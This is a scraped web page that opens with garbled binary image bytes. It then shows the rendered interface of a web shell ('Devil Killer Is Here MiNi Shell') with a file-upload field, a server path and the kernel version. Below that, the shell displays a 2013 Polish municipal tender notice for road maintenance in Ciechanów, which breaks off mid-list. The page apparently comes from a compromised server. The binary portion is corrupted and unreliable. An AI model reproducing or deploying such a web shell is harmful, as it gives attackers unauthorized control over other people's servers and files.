JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131217/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131217/274459-N-2013.html

<p class="kh_header"><b>Ciechanów: Bieżące utrzymanie dróg publicznych gminnych i wewnętrznych Gminy Miejskiej 	Ciechanów będących w zarządzie Prezydenta Miasta Ciechanów w okresie od dnia podpisania umowy  do 
31 grudnia 2014 r.</b><br>
<b>Numer ogłoszenia: 274459 - 2013; data zamieszczenia: 17.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Ciechanów reprezentowana przez Prezydenta Miasta Ciechanów , Plac Jana Pawła II 6, 06-400 Ciechanów, woj. mazowieckie, tel. 23 6749200, faks 23 672 29 63.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umciechanow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bieżące utrzymanie dróg publicznych gminnych i wewnętrznych Gminy Miejskiej 	Ciechanów będących w zarządzie Prezydenta Miasta Ciechanów w okresie od dnia podpisania umowy  do 
31 grudnia 2014 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia w przetargu nieograniczonym jest: 
bieżące utrzymanie dróg publicznych gminnych i wewnętrznych Gminy Miejskiej 	Ciechanów będących w zarządzie Prezydenta Miasta Ciechanów w okresie od dnia podpisania umowy  do 
31 grudnia 2014 r.

Długość dróg gminnych  na dzień sporządzenia SIWZ wynosi: 114,640 km 
-	nawierzchnie dróg utwardzonych : 94,686 km
-	nawierzchnie dróg nieutwardzonych: 19,954 km
Długość dróg wewnętrznych wynosi: 42 538,00 km


2.	Szczegółowy zakres robót zgodny z § 1.pkt. 4 siwz. Ilości robót zostały określone szacunkowo na potrzeby oceny i wyboru oferty najkorzystniejszej. W związku z charakterem robót trudnym do przewidzenia ilościowo, w  miarę potrzeby zakres robót może ulec zmianie.
Roboty stanowiące przedmiot zamówienia należy wykonywać w terminach i zgodnie ze zleceniami jakie będą wystawiane w trakcie trwania realizacji umowy. 
3. Zakres prac będących przedmiotem tego postępowania podzielono na sześć części, każdy z Wykonawców może złożyć ofertę na dowolną liczbę części.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający na zadaniu nr 5 przewiduje  zgodnie z art. 67 ust.1 pkt 6 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień  udzielenie zamówienia uzupełniającego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.31.42-6, 45.23.32.20-7, 45.23.32.52-0, 45.23.32.23-8, 45.23.32.90-8, 45.23.32.21-4, 45.23.32.22-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Zamawiający wymaga wniesienia wadium w wysokości:
	8 000  zł dla zadania 1,
    10 000  zł dla zadania 2
    15 000  zł dla zadania 3,  
4 000  zł dla zadania 4,  
	2 000  zł dla zadania 5
	6 000  zł dla zadania 6
	
przed terminem składania ofert w formach przewidzianych przez ustawę.
W przypadku wadium w formie pieniężnej należy je wpłacić przelewem na rachunek 54821300082001008888880010 Bank Spółdzielczy Ciechanów.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia wymogu na potwierdzenie powyższego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zrealizowanie w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie przynajmniej jednego zamówienia o wartości i rodzaju wymaganym przez Zamawiającego, tj. bieżące utrzymanie dróg, odpowiednio za kwotę: Zadanie 1 - 100.000,00 zł brutto rocznie,  Zadanie 2 - 200.000,00 zł brutto rocznie, Zadanie 3 - 300.000,00 zł brutto rocznie, Zadanie 4 - 100.000,00 zł  brutto rocznie, Zadanie 5 - 50.000,00 zł  brutto rocznie, Zadanie 6 - 100.000,00 zł  brutto rocznie,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia wymogu na potwierdzenie powyższego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowanie odpowiednimi  osobami zdolnymi do wykonywania zamówienia  tj: kierownikiem budowy i/lub robót który w imieniu Wykonawcy będzie uczestniczył w realizacji niniejszego zamówienia, który musi posiadać kwalifikacje i uprawnienia budowlane w specjalności drogowej.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia wymogu na potwierdzenie powyższego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Zrealizowanie w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie przynajmniej jednego zamówienia o wartości i rodzaju wymaganym przez Zamawiającego, tj. bieżące utrzymanie dróg, odpowiednio za kwotę: Zadanie 1 - 100.000,00 zł brutto rocznie,  Zadanie 2 - 200.000,00 zł brutto rocznie, Zadanie 3 - 300.000,00 zł brutto rocznie, Zadanie 4 - 100.000,00 zł  brutto rocznie, Zadanie 5 - 50.000,00 zł  brutto rocznie, Zadanie 6 - 100.000,00 zł  brutto rocznie,;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) Wypełniony i podpisany formularz oferty. Wzór dokumentu jest dodatkiem nr 1 do siwz. 
b) Wypełniony formularz cenowy- dokument  wypełniony i podpisany przez wykonawcę. Wzór dokumentu jest dodatkiem do siwz nr 9, 10, 11 z literą odpowiadającą zadaniom na które składana jest oferta;
c) opracowany na podstawie przedmiaru robót kosztorys ofertowy  
d) podpisany wzór umowy przez upoważnionych przedstawicieli wykonawcy. Wzór   dokumentu jest dodatkiem nr 13 do siwz;
e)	W przypadku jeżeli w wykazie osób wykonawca wskazał osoby, którymi będzie dysponował-pisemne zobowiązanie do udostępnienia osób zdolnych do wykonania zamówienia. Wzór dokumentu stanowi dodatek nr 5 do siwz.
f)W przypadku jeżeli wykonawca polegał będzie na zasobach wiedzy i doświadczenia innych podmiotów - pisemne zobowiązanie do udostępnienia zasobów niezbędnych do wykonania zamówienia. Wzór dokumentu stanowi dodatek nr 6 do siwz</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian treści zawieranej umowy w sprawie zamówienia publicznego w zakresie: zmiany kierowników robót lub budowy, zmiany podwykonawców, zmiany zakresu robót (roboty dodatkowe, zamienne, roboty pominięte w przedmiarze a przewidziane w dokumentacji projektowej niebędące robotami towarzyszącymi zawartymi w kosztach ogólnych), zmiany terminu realizacji.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.umciechanow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Ciechanów,
Pl. Jana Pawła II, pokój nr 115, Stanowisko ds Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.01.2014 godzina 12:00, miejsce: Oferty należy składać w siedzibie zamawiającego Biurze Podawczym przy ul.
Wodnej 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Otwarcie ofert jest jawne, nastąpi 02.01.2014r. o godzinie 12:15 w siedzibie
Zamawiającego (sala konferencyjna przy ul. Wodnej 1, parter budynku). 2. Zamawiający nie przewiduje
ustanowienia dynamicznego systemu zakupów. 3. Zamawiający nie zamierza zawrzeć umowy ramowej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Bieżące utrzymanie dróg utwardzonych - remont nawierzchni chodników.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rozebranie ław pod krawężniki z betonu	m3-	18
Rozebranie krawężników betonowych na podsypce piaskowej	m-	300
Rozebranie obrzeży trawnikowych o wymiarach 6x20 cm na podsypce piaskowej	m-	400
Rozebranie chodników z płyt betonowych o wymiarach 35x35x5 cm na podsypce piaskowej	m2-	150
Rozebranie nawierzchni z betonu gr. 15 cm ręcznie	m2-	100
Rozebranie chodników z płyt betonowych o wymiarach 50x50x7 cm na podsypce piaskowej	m2-	150
Remonty cząstkowe nawierzchni z płyt drogowych betonowych sześciokątnych lub kwadratowych grubości 12 cm ze spoinami wypełnionymi piaskiem	m2-	100
Remonty cząstkowe nawierzchni z kostki kamiennej nieregularnej wysokości 6 cm na podsypce piaskowej i ze spoinami wypełnionymi piaskiem	m2-	400
Koryta gł. 10 cm wykonywane w gruntach kat. II-IV na poszerzeniach jezdni lub chodników	m2-	300
Remonty cząstkowe chodników z płyt betonowych o wym. 35x35x5 na podsypce piaskowej ze spoinami wypełnionymi piaskiem	m2-	100
Remonty cząstkowe chodników z płyt betonowych o wym. 50x50x7 na podsypce cementowo-piaskowej ze spoinami wypełnionymi zaprawą cementową	m2-	100
Warstwy odsączające wykonane i zagęszczane mechanicznie o gr.10 cm	m2-	1000
Podbudowy betonowe gr.15 cm pielęgnowane piaskiem i wodą	m2-	400
Podbudowy betonowe gr.10 cm pielęgnowane piaskiem i wodą- z betonu B-7,5	m2-	600
Warstwa górna podbudowy z kruszyw łamanych gr. 10 cm	m2-	100
Warstwa górna podbudowy z kruszyw łamanych gr. 15 cm	m2-	100
Krawężniki betonowe wystające o wymiarach 15x30 cm z wykonaniem ław betonowych na podsypce cementowo-piaskowej	m-	500
Obrzeża betonowe o wymiarach 20x6 cm na podsypce piaskowej, spoiny wypełnione zaprawą cementową	m-	1000
Chodniki z kostki brukowej betonowej grubości 6 cm na podsypce cementowo-piaskowej z wypełnieniem spoin piaskiem	m2-	2000
Chodniki z kostki brukowej betonowej grubości 8 cm na podsypce cementowo-piaskowej z wypełnieniem spoin piaskiem	m2-	100
Chodniki z kostki brukowej betonowej grubości 8 cm na podsypce cementowo-piaskowej z wypełnieniem spoin piaskiem (z kostki kolorowej)	m2-	100
Regulacja pionowa studzienek dla urządzeń podziemnych przy objętości betonu w jednym miejscu do 0.1 m3	m3-	10
Regulacja pionowa studzienek dla urządzeń podziemnych poprzez założenie pierścieni dystansowych	szt-	5
Regulacja pionowa studzienek dla urządzeń podziemnych poprzez założenie ramek dystansowych	szt-	5
Wywiezienie gruzu spryzmowanego samochodami samowyładowczymi na odległość do 1 km	m3-	60
Wywiezienie gruzu spryzmowanego samochodami samowyładowczymi na każdy następny 1 km	m3-	60
Nawierzchnie z płyt drogowych betonowych kwadratowych grubości 12 cm, spoiny wypełnione piaskiem	m2-	20
Regulacja pionowa studzienek dla włazów kanałowych z wymianą włazów	szt.	5
Roboty ziemne wykonywane koparkami przedsiębiernymi o poj.łyżki 0.25 m3 w gr.kat. III-IV z transp.urobku na odl.do 1 km sam.samowyład.	m3-	200
Dodatek za każdy rozp. 1 km transportu ziemi samochodami samowyładowczymi po drogach o nawierzchni utwardzonej(kat.gr. I-IV)-dalsze 4km	m3-	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.32.22-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Bieżące utrzymanie dróg utwardzonych - remonty cząstkowe masą z recyklera, 
  utrwalenie i regeneracja nawierzchni.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wyrównanie lokalnych nierówności mieszankami mineralno - bitumicznymi masą z recyklera	t-	500
Remonty cząstkowe nawierzchni powierzchniowo utrwalonych przy pomocy grysów - wyboje o głębokości 1.5 cm	m2-	500
Remonty cząstkowe nawierzchni powierzchniowo utrwalonych przy pomocy grysów - wyboje o głębokości 2.0 cm	m2-	500
Remonty cząstkowe nawierzchni powierzchniowo utrwalonych przy pomocy grysów - wyboje o głębokości 3.0 cm	m2-	300
Powierzchniowe utrwalanie nawierzchni drogowych emulsją asfaltową modyfikowaną C65 B3 PU/RC i grysem kamiennym o wym.1-2 mm w ilości 8 dm3/m2	m2-	3000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.31.42-6, 45.23.32.20-7, 45.23.32.52-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Bieżące utrzymanie nawierzchni dróg nieutwardzonych (żwirowych, 
 szlakowych, gruntowych).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Naprawy dróg gruntowych - profilowanie	m2-	200 000
Naprawy dróg gruntowych - wyrównanie z uzupełnieniem materiałem miejscowym-pospółką	m3-	200
Naprawy dróg gruntowych - wyrównanie z uzupełnieniem materiałem miejscowym-żużlem paleniskowym	m3-	200
Roboty ziemne wykonywane koparkami przedsiębiernymi o poj.łyżki 0.25 m3 w gr.kat. III-IV z transp. urobku na odl. do 1 km sam.samowyład.	m3-	100
Dodatek za każdy rozp. 1 km transportu ziemi samochodami samowyładowczymi po drogach o nawierzchni utwardzonej (kat.gr. I-IV)	m3-	100
Wyrównanie istniejącej podbudowy tłuczniem kamiennym sortowanym zagęszczanym mechanicznie o gr. do 10 cm	m3-	1000
Wyrównanie istniejącej podbudowy tłuczniem kamiennym sortowanym zagęszczanym mechanicznie o gr. do 10 cm-betonowym	m3-	700
Wyrównanie istniejącej podbudowy tłuczniem kamiennym sortowanym zagęszczanym mechanicznie o gr. ponad 10 cm	m3-	100
Wyrównanie istniejącej podbudowy tłuczniem kamiennym sortowanym zagęszczanym mechanicznie o gr. ponad 10 cm-tłuczniem betonowym	m3-	100
Profilowanie i zagęszczanie podłoża wykonywane mechanicznie walcem	mg-	200
(KNK 2-11) Usuwanie namułu grubości 40 cm z cieków o głębokości do 1.5 m i szerokości dna 0.6 m	m-	500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.31.42-6, 45.23.32.20-7, 45.23.32.52-0, 45.23.32.23-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Bieżące utrzymanie oznaczeń pionowych (znaki drogowe, tablice z nazwami ulic itp.).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pionowe znaki drogowe - słupki z rur stalowych dł. 3,5m	szt.-	100
Pionowe znaki drogowe - słupki z rur stalowych dł. 4,5m	szt.	-50
Pionowe znaki drogowe - słupki z rur stalowych dł. 2,5m-słupek z rozbiórki	szt.-	10
Pionowe znaki drogowe - znaki zakazu, nakazu, ostrzegawcze i informacyjne o pow. ponad 0.3 m2 (BiC)	szt.-	70
Pionowe znaki drogowe - znaki zakazu, nakazu, ostrzegawcze i informacyjne o pow. ponad 0.3 m2 AiD)	szt.-	150
